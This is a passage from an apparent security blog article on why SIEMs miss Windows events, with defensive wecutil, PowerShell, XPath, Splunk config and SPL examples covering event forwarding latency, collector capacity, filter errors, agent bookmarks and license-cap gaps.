Batches events.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::            Events buffered on source for up to 15 minutes.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::            During a 4-minute incident, you may see NO events in SIEM.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Minimize Latency:  30 seconds delivery delay.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::            Better for detection but higher WEC load.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Minimize Bandwidth: 6 hours delivery delay.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::            Clearly wrong for security use cases.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set a subscription to Minimize Latency mode:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil ss \"BaselineSubscription\" /cm:MinLatency</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Or set custom timing (delivery every 30 seconds, heartbeat every 
60):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil ss \"BaselineSubscription\" /cm:Custom /hi:60000 /dmlt:30000</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Verify (findstr treats space-separated words as alternatives):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil gs \"BaselineSubscription\" | findstr -i \"latency heartbeat delivery\"</span><br></span></code></pre></div></div>\n<p>In Normal mode, a 15-minute incident can generate zero SIEM alerts because events haven't been forwarded yet. This is not a theoretical concern; it is a documented behavior that directly impacts mean time to detect.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"43-wec-server-capacity-limits-and-drop-behavior\">4.3 WEC Server Capacity Limits and Drop Behavior<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#43-wec-server-capacity-limits-and-drop-behavior\" class=\"hash-link\" aria-label=\"Direct link to 4.3 WEC Server Capacity Limits and Drop Behavior\" title=\"Direct link to 4.3 WEC Server Capacity Limits and Drop Behavior\" translate=\"no\">​</a></h3>\n<p>A WEC server on commodity hardware handles approximately 3,000 events per second on average across all subscriptions. This sounds like a lot. It is not, for a large enterprise.</p>\n<p>Calculation: 1,000 workstations × 150 events/sec each at peak (logon storms, patch Tuesday, incident response) = 150,000 events/sec. 
A single WEC server will be saturated at ~2% of that load.</p>\n<p>When the WEC server exceeds capacity:</p>\n<!-- -->\n<p>Monitor WEC health with these performance counters:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run on the WEC server</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$counters = @(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Event Tracing for Windows Session(EventLog-ForwardedEvents)\\Events Lost',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Event Tracing for Windows Session(EventLog-ForwardedEvents)\\Events Logged per second',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Web Service(_Total)\\Current Connections',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Web Service(_Total)\\Maximum Connections',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Processor(_Total)\\% Processor Time',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Memory\\Available MBytes'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Continuous monitoring with 10-second samples</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-Counter -Counter $counters -SampleInterval 10 -MaxSamples 60 |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object -ExpandProperty CounterSamples |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Path, CookedValue, Timestamp |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Watch specifically for the Events Lost counter: any non-zero value is critical</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-Counter '\\Event Tracing for Windows Session(EventLog-ForwardedEvents)\\Events Lost' `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -SampleInterval 5 -MaxSamples 12 |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object -ExpandProperty CounterSamples |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { $_.CookedValue -gt 0 } |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object { Write-Warning \"EVENTS LOST at $($_.Timestamp): 
$($_.CookedValue)\" }</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"44-xpath-subscription-filters-the-gaps-you-introduced-intentionally\">4.4 XPath Subscription Filters: The Gaps You Introduced Intentionally<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#44-xpath-subscription-filters-the-gaps-you-introduced-intentionally\" class=\"hash-link\" aria-label=\"Direct link to 4.4 XPath Subscription Filters: The Gaps You Introduced Intentionally\" title=\"Direct link to 4.4 XPath Subscription Filters: The Gaps You Introduced Intentionally\" translate=\"no\">​</a></h3>\n<p>WEF subscriptions use XPath queries to filter which events are forwarded. These queries are powerful but error-prone. A syntax mistake or logic error in an XPath filter silently excludes events with no error message.</p>\n<p>Example of a broken XPath filter that silently misses events:</p>\n<div class=\"language-xml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-xml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">&lt;!-- BROKEN: This filter tries to catch Event ID 4688 AND 4624</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">     but the XPath is semantically wrong and will not match anything --&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token tag punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">&lt;</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Query</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Id</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">0</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Path</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">Security</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Select</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Path</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">Security</span><span 
class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    *[System[(EventID=4688)]] AND *[System[(EventID=4624)]]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;/</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Select</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;/</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Query</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">&lt;!-- CORRECT: Use separate Select elements or proper XPath OR syntax --&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Query</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 
35%)\">Id</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">0</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Path</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">Security</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Select</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Path</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">Security</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    *[System[(EventID=4688 or EventID=4624)]]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;/</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Select</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;/</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Query</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><br></span></code></pre></div></div>\n<p>Validate your XPath filters before deployment:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Test an XPath filter against local logs before putting it in a subscription</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># This reveals whether the filter syntax is correct and returns events</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$xpath = \"*[System[(EventID=4688 or EventID=4624 or EventID=4625)]]\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$logName = 
\"Security\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $events = Get-WinEvent -LogName $logName -FilterXPath $xpath -MaxEvents 10 -ErrorAction Stop</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Host \"XPath filter valid. Matched $($events.Count) recent events.\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $events | Select-Object TimeCreated, Id, Message | Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} catch [System.Exception] {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Error \"XPath filter INVALID or no matching events: $_\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Also validate that key event IDs ARE present in the log at all</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># (if they're not, the audit policy isn't generating them)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$criticalEventIDs = @(4688, 4624, 4625, 4672, 4698, 4719, 4776)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">foreach ($id in $criticalEventIDs) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $count = (Get-WinEvent -LogName Security -FilterXPath \"*[System[EventID=$id]]\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              -MaxEvents 1000 -ErrorAction SilentlyContinue).Count</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $status = if ($count -gt 0) { \"✓ Present ($count in last 1000)\" } else { \"⚠ ABSENT: check audit policy\" }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Host \"Event ID $id : $status\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-5--the-siem-agent-layer-hidden-drop-points\">Part 5 - The SIEM Agent Layer: Hidden Drop Points<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-5--the-siem-agent-layer-hidden-drop-points\" class=\"hash-link\" aria-label=\"Direct link to Part 5 - The SIEM Agent Layer: Hidden Drop Points\" title=\"Direct link to Part 5 - The SIEM Agent Layer: Hidden Drop Points\" translate=\"no\">​</a></h2>\n<p>SIEM agents (Splunk Universal Forwarder, Elastic Agent, Microsoft Monitoring Agent, etc.) introduce their own failure modes. 
These are frequently overlooked because the agent is \"running\" and heartbeating to the SIEM, even while dropping events.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"51-the-bookmark-race-condition\">5.1 The Bookmark Race Condition<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#51-the-bookmark-race-condition\" class=\"hash-link\" aria-label=\"Direct link to 5.1 The Bookmark Race Condition\" title=\"Direct link to 5.1 The Bookmark Race Condition\" translate=\"no\">​</a></h3>\n<p>SIEM agents reading <code>.evtx</code> files maintain a local bookmark (position marker) in the file they are reading. The agent reads from the bookmark forward, ships events, and updates the bookmark. The race condition:</p>\n<!-- -->\n<p>The fix is twofold: make the log large enough that it doesn't wrap during the agent's read cycle, and ensure the agent's batch processing interval is short enough relative to the event generation rate. 
For Splunk UF:</p>\n<div class=\"language-ini codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-ini codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># inputs.conf: Splunk Universal Forwarder tuning for high-volume Security logs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Splunk .conf files do not support inline comments (text after a value becomes part of the value),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># so every comment below sits on its own line</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">[WinEventLog://Security]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">disabled = 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">start_from = oldest</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">current_only = 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Flush bookmark every 5 seconds (default: 60)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">checkpointInterval = 5</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Read 10 events per batch (tune down on busy DCs)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">batch_size = 10</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Capture full XML for field extraction</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">renderXml = true</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Exclude logoff events if volume too high</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">blacklist1 = EventCode=\"4634\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Exclude handle requests (very noisy)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">blacklist2 = EventCode=\"4656\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">[WinEventLog://Microsoft-Windows-Sysmon/Operational]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">disabled = 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">start_from = oldest</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">checkpointInterval = 5</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">batch_size = 20</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">renderXml = true</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"52-license-cap-induced-dropping-the-invisible-budget-problem\">5.2 License-Cap Induced Dropping (The Invisible Budget Problem)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#52-license-cap-induced-dropping-the-invisible-budget-problem\" class=\"hash-link\" aria-label=\"Direct link to 5.2 License-Cap Induced Dropping (The Invisible Budget Problem)\" title=\"Direct link to 5.2 License-Cap Induced Dropping (The Invisible Budget Problem)\" translate=\"no\">​</a></h3>\n<p>Many SIEM platforms enforce daily ingestion limits based on license volume. When the daily cap is hit:</p>\n<ul>\n<li class=\"\"><strong>Splunk:</strong> Indexing stops. No new events accepted until the next license window. 
A warning appears in the Splunk UI, but only if someone is watching.</li>\n<li class=\"\"><strong>Microsoft Sentinel:</strong> Ingestion continues but per-GB pricing means cost spikes, sometimes triggering organizational decisions to cap ingestion, implemented via Data Collection Rules that silently filter events.</li>\n<li class=\"\"><strong>Elastic:</strong> License limits restrict feature use, but ingest is less commonly hard-capped.</li>\n</ul>\n<p>Check your Splunk license usage:</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| rest /services/licenser/pools</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| table title, used_bytes, effective_quota, slave_count</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval used_GB = round(used_bytes/1073741824, 2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval quota_GB = round(effective_quota/1073741824, 2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval pct_used = round((used_bytes/effective_quota)*100, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where pct_used &gt; 80</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort -pct_used</span><br></span></code></pre></div></div>\n<p>Check for indexing gaps in Splunk 
(license exceeded periods):</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=_internal source=*license_usage.log type=Usage</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| timechart span=1h sum(b) as bytes_indexed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval GB_indexed = round(bytes_indexed/1073741824, 2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where GB_indexed = 0</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-6--how-to-actually-measure-your-collection-fidelity\">Part 6 - How to Actually Measure Your Collection Fidelity<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-6--how-to-actually-measure-your-collection-fidelity\" class=\"hash-link\" aria-label=\"Direct link to Part 6 - How to Actually Measure Your Collection Fidelity\" title=\"Direct link to Part 6 - How to Actually Measure Your Collection Fidelity\" translate=\"no\">​</a></h2>\n<p>Everything above describes where things go wrong. 
This section tells you how to measure whether they are going wrong in your environment, right now.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"61-the-eventrecordid-continuity-test\">6.1 The EventRecordID Continuity Test<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#61-the-eventrecordid-continuity-test\" class=\"hash-link\" aria-label=\"Direct link to 6.1 The EventRecordID Continuity Test\" title=\"Direct link to 6.1 The EventRecordID Continuity Test\" translate=\"no\">​</a></h3>\n<p>The most direct measurement: compare the EventRecordID sequence seen in your SIEM against what the source machine has generated. Any gap = events you do not have.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On the source machine: get the current highest EventRecordID and earliest retained</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$securityLog = Get-WinEvent -LogName Security -MaxEvents 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$oldestEvent = Get-WinEvent -LogName Security -MaxEvents 1 -Oldest</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 